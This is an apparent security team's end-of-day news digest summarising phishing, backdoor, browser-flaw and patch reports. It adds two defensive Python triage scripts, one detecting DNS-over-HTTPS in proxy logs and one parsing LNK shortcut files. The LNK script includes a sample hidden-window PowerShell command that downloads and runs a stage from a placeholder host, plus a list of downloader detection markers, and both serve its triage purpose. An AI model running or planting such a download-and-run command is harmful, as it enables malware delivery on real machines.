=====================
= End-of-Day report =
=====================

Timeframe:   Thursday 27-03-2025 18:00 − Friday 28-03-2025 18:00
Handler:     Alexander Riepl
Co-Handler:  Michael Schlagenhaufer
=====================
=       News        =
=====================
∗∗∗ Phishing-as-a-service operation uses DNS-over-HTTPS for evasion ∗∗∗
---------------------------------------------
A newly discovered phishing-as-a-service (PhaaS) operation that researchers call Morphing Meerkat has been using the DNS over HTTPS (DoH) protocol to evade detection.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/phishing-as-a-service-operati...
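DoH hides DNS lookups inside ordinary HTTPS, so the usual DNS-server logs never see them; the place they do remain visible is the web proxy. The following is an added example (not from the BleepingComputer article or the Morphing Meerkat kit) of a small triage script that flags requests to well-known public DoH endpoints in proxy logs and decodes the queried name from the RFC 8484 GET form. The log lines and the resolver list are constructed for illustration; extend the list with the resolvers your environment does or does not sanction.

```python
"""Flag DNS-over-HTTPS traffic in HTTP proxy logs and decode the queried name.

Added example. Log lines are constructed; the endpoint list is illustrative,
not an inventory of every public DoH resolver.
"""
import base64
import struct
from typing import Optional
from urllib.parse import parse_qs, urlparse

# RFC 8484 resolvers expose /dns-query; dns.google also has a JSON API at /resolve.
DOH_ENDPOINTS = {
    "dns.google": ("/dns-query", "/resolve"),
    "cloudflare-dns.com": ("/dns-query",),
    "mozilla.cloudflare-dns.com": ("/dns-query",),
    "dns.quad9.net": ("/dns-query",),
}
QTYPE_NAMES = {1: "A", 15: "MX", 16: "TXT", 28: "AAAA"}


def build_query(name: str, qtype: int) -> bytes:
    """Minimal DNS query message (RFC 1035 wire format), used only to build sample data."""
    header = struct.pack("!HHHHHH", 0, 0x0100, 1, 0, 0, 0)  # ID 0, RD set, one question
    qname = b"".join(bytes([len(lbl)]) + lbl.encode() for lbl in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", qtype, 1)  # QCLASS IN


def b64url(data: bytes) -> str:
    """RFC 8484 GET carries the message base64url-encoded *without* padding."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def decode_query(param: str) -> tuple:
    """Decode the 'dns' GET parameter back to (qname, qtype name)."""
    raw = base64.urlsafe_b64decode(param + "=" * (-len(param) % 4))
    _id, _flags, qdcount, *_ = struct.unpack("!HHHHHH", raw[:12])
    if qdcount < 1:
        return ("", "")
    pos, labels = 12, []
    while raw[pos] != 0:                       # walk the length-prefixed labels
        length = raw[pos]
        labels.append(raw[pos + 1:pos + 1 + length].decode(errors="replace"))
        pos += 1 + length
    qtype = struct.unpack("!H", raw[pos + 1:pos + 3])[0]
    return (".".join(labels), QTYPE_NAMES.get(qtype, str(qtype)))


def classify(line: str) -> Optional[dict]:
    """One 'client method url content-type' log line -> finding dict, or None if not DoH."""
    client, method, url, ctype = line.split()
    u = urlparse(url)
    if u.hostname not in DOH_ENDPOINTS or u.path not in DOH_ENDPOINTS[u.hostname]:
        return None
    finding = {"client": client, "resolver": u.hostname, "method": method, "qname": "", "qtype": ""}
    qs = parse_qs(u.query)
    if method == "GET" and "dns" in qs:                          # RFC 8484 GET form
        finding["qname"], finding["qtype"] = decode_query(qs["dns"][0])
    elif method == "GET" and "name" in qs:                       # Google JSON API form
        finding["qname"] = qs["name"][0]
        finding["qtype"] = qs.get("type", ["A"])[0]
    elif method == "POST" and ctype == "application/dns-message":  # RFC 8484 POST form
        finding["qname"] = finding["qtype"] = "(in POST body)"
    return finding


def scan(log: str) -> list:
    """Return findings for every DoH request in a multi-line log."""
    return [f for f in (classify(l) for l in log.splitlines() if l.strip()) if f]


# Constructed sample log (assumed field order: client, method, URL, request content-type or '-').
SAMPLE_LOG = "\n".join([
    f"10.0.0.5 GET https://dns.google/dns-query?dns={b64url(build_query('example.com', 15))} -",
    "10.0.0.5 POST https://cloudflare-dns.com/dns-query application/dns-message",
    "10.0.0.6 GET https://www.example.com/index.html -",
    "10.0.0.7 GET https://dns.google/resolve?name=example.com&type=MX -",
])

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```

Only the GET form exposes the question in the URL; for POST requests the query sits in the request body, so the proxy has to log or inspect bodies to recover it, and an in-browser script can choose POST precisely for that reason. Treat any DoH use from a host whose browser is configured to use the corporate resolver as worth a look.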
∗∗∗ Emergency update: Critical sandbox flaw discovered in Firefox and Tor Browser ∗∗∗
---------------------------------------------
It is not only Chrome users who should update their browser these days. An actively exploited vulnerability also affects the Windows version of Firefox.
---------------------------------------------
https://www.golem.de/news/notfallupdate-kritische-sandbox-luecke-in-firefox-...
∗∗∗ Stealing user credentials with evilginx ∗∗∗
---------------------------------------------
A malevolent mutation of the widely used nginx web server facilitates Adversary-in-the-Middle action, but there's hope.
---------------------------------------------
https://news.sophos.com/en-us/2025/03/28/stealing-user-credentials-with-evil...
∗∗∗ Quick Guide to Magento Security Patches ∗∗∗
---------------------------------------------
Magento remains a popular ecommerce platform in 2025 and its security patches play a vital role in addressing vulnerabilities that could otherwise be exploited by attackers. These patches help prevent issues like data breaches, website defacement, or unauthorized access, ensuring the safety of customer data and store operations. Given the platform's ..
---------------------------------------------
https://blog.sucuri.net/2025/03/quick-guide-to-magento-security-patches.html
∗∗∗ China's FamousSparrow flies back into action, breaches US org after years off the radar ∗∗∗
---------------------------------------------
Crew also cooked up two fresh SparrowDoor backdoor variants, says ESET

The China-aligned FamousSparrow crew has resurfaced after a long period of presumed inactivity, compromising a US financial-sector trade group and a Mexican research institute. The gang also likely targeted a governmental institution in Honduras, along with other yet-to-be-identified victims.
---------------------------------------------
https://www.theregister.com/2025/03/27/china_famoussparrow_back/
∗∗∗ Storage appliances: Dell closes numerous security holes in the Unity series ∗∗∗
---------------------------------------------
Among other things, Dell's developers have closed a 19-year-old vulnerability in various Unity models.
---------------------------------------------
https://www.heise.de/news/Storage-Appliances-Dell-schliesst-unzaehlige-Siche...
∗∗∗ New security requirements adopted by HTTPS certificate industry ∗∗∗
---------------------------------------------
The Chrome Root Program launched in 2022 as part of Google's ongoing commitment to upholding secure and reliable network connections in Chrome. We previously described how the Chrome Root Program keeps users safe, and described how the program is focused on promoting technologies and practices that strengthen the underlying ..
---------------------------------------------
http://security.googleblog.com/2025/03/new-security-requirements-adopted-by....
∗∗∗ Money Laundering 101, and why Joe is worried ∗∗∗
---------------------------------------------
In this blog post, Joe covers the very basics of money laundering, how it facilitates ransomware cartels, and what the regulatory future holds for cybercrime.
---------------------------------------------
https://blog.talosintelligence.com/money-laundering-101-and-why-joe-is-worri...
∗∗∗ Gamaredon campaign abuses LNK files to distribute Remcos backdoor ∗∗∗
---------------------------------------------
Cisco Talos is actively tracking an ongoing campaign, active since at least November 2024, that targets users in Ukraine with malicious LNK files which run a PowerShell downloader.
---------------------------------------------
https://blog.talosintelligence.com/gamaredon-campaign-distribute-remcos/
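When an LNK file is the first stage, the PowerShell command it launches is stored in the shortcut's own StringData (the COMMAND_LINE_ARGUMENTS field), so it can be pulled out for triage without ever executing the file. The following is an added example (not Talos code and not taken from the campaign) that walks the MS-SHLLINK layout, returns the embedded command line and relative target path, and marks common downloader indicators. The sample .lnk bytes and the argument string are constructed here for illustration; `example.invalid` is a placeholder host.

```python
"""Extract the command line embedded in a Windows .LNK file for offline triage.

Added example. Follows the MS-SHLLINK layout: 0x4C-byte ShellLinkHeader,
optional LinkTargetIDList and LinkInfo, then StringData. The sample shortcut
is constructed below; nothing here comes from a real campaign.
"""
import struct

HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # CLSID_ShellLink, little-endian
# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7
# StringData items appear in exactly this order, each only if its flag is set.
STRING_FIELDS = [("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION)]
# Substrings that commonly mark a hidden PowerShell download-and-run command line.
SUSPICIOUS = ("powershell", "-w hidden", "-windowstyle hidden", "-nop", "-enc",
              "-encodedcommand", "bypass", "downloadstring", "invoke-webrequest",
              "invoke-expression", "mshta", "cmd /c")


def _read_string(data: bytes, pos: int, unicode: bool) -> tuple:
    """StringData item: CountCharacters (u16) followed by that many characters."""
    count = struct.unpack_from("<H", data, pos)[0]
    pos += 2
    if unicode:
        return data[pos:pos + 2 * count].decode("utf-16-le"), pos + 2 * count
    return data[pos:pos + count].decode("cp1252"), pos + count


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a shell link; raise ValueError if it is not one."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a shell link: bad HeaderSize")
    if data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link: bad CLSID")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]  # IDListSize excludes itself
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]      # LinkInfoSize includes itself
    out = {"flags": flags}
    unicode = bool(flags & IS_UNICODE)
    for key, bit in STRING_FIELDS:
        if flags & bit:
            out[key], pos = _read_string(data, pos, unicode)
    return out


def suspicious_markers(arguments: str) -> list:
    """Which SUSPICIOUS substrings occur (case-insensitively) in the command line."""
    low = arguments.lower()
    return [m for m in SUSPICIOUS if m in low]


def build_lnk(arguments: str, relative_path: str = "", unicode: bool = True) -> bytes:
    """Construct a minimal .lnk holding only StringData (no IDList, no LinkInfo)."""
    flags = HAS_ARGUMENTS | (IS_UNICODE if unicode else 0) | (HAS_RELATIVE_PATH if relative_path else 0)
    header = struct.pack("<I", HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
    header += b"\x00" * (HEADER_SIZE - len(header))       # attributes, timestamps etc. zeroed

    def enc(s: str) -> bytes:
        raw = s.encode("utf-16-le") if unicode else s.encode("cp1252")
        return struct.pack("<H", len(s)) + raw

    body = enc(relative_path) if relative_path else b""   # relative_path precedes arguments
    return header + body + enc(arguments)


# Constructed sample: a shortcut to powershell.exe carrying a hidden-window downloader line.
SAMPLE_ARGS = ('-w hidden -nop -c "Invoke-WebRequest https://example.invalid/stage2 '
               '-OutFile $env:TEMP\\s.ps1; . $env:TEMP\\s.ps1"')
SAMPLE_LNK = build_lnk(SAMPLE_ARGS,
                       relative_path="..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe")

if __name__ == "__main__":
    info = parse_lnk(SAMPLE_LNK)
    print("target :", info.get("relative_path"))
    print("args   :", info.get("arguments"))
    print("markers:", suspicious_markers(info.get("arguments", "")))
```

Real shortcuts usually carry a LinkTargetIDList and LinkInfo in front of the strings, which is why the parser honours those two flags before reading StringData; an LNK whose relative path points at powershell.exe and whose arguments match several markers is the pattern worth pulling for full analysis.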
∗∗∗ Obfuscation 101: Unmasking the Tricks Behind Malicious Code ∗∗∗
---------------------------------------------
"The malicious package was right in front of our eyes, but we didn't see it until it was too late." Attackers frequently rely on obfuscation, the technique of deliberately making source code confusing and unreadable, to sneak malicious payloads past security defenses and code reviewers alike. Understanding these obfuscation techniques across ..
---------------------------------------------
https://socket.dev/blog/obfuscation-101-the-tricks-behind-malicious-code
∗∗∗ NVD Concedes Inability to Keep Pace with Surging CVE Disclosures in 2025 ∗∗∗
---------------------------------------------
The National Vulnerability Database (NVD) issued a new status update on March 19, attempting to clarify the current state of its vulnerability processing pipeline. The agency says it has resumed processing new CVEs at the same rate it maintained before last year's slowdown, but with vulnerability volumes surging, that's no longer enough. We are currently ..
---------------------------------------------
https://socket.dev/blog/nvd-backlog-crisis-deepens-amid-surging-cve-disclosu...
=====================
=  Vulnerabilities  =
=====================
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (mercurial and opensaml), Fedora (augeas, mingw-libxslt, and nodejs-nodemon), Mageia (chromium-browser-stable), Red Hat (grafana, kernel, kernel-rt, opentelemetry-collector, and podman), SUSE (apache-commons-vfs2, python3, and python36), and Ubuntu (ghostscript, linux, linux-aws, linux-azure, linux-gcp, linux-gke, linux-gkeop, linux-ibm, linux-intel-iotg, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-nvidia, linux-oracle, linux-oracle-5.15, ..
---------------------------------------------
https://lwn.net/Articles/1015718/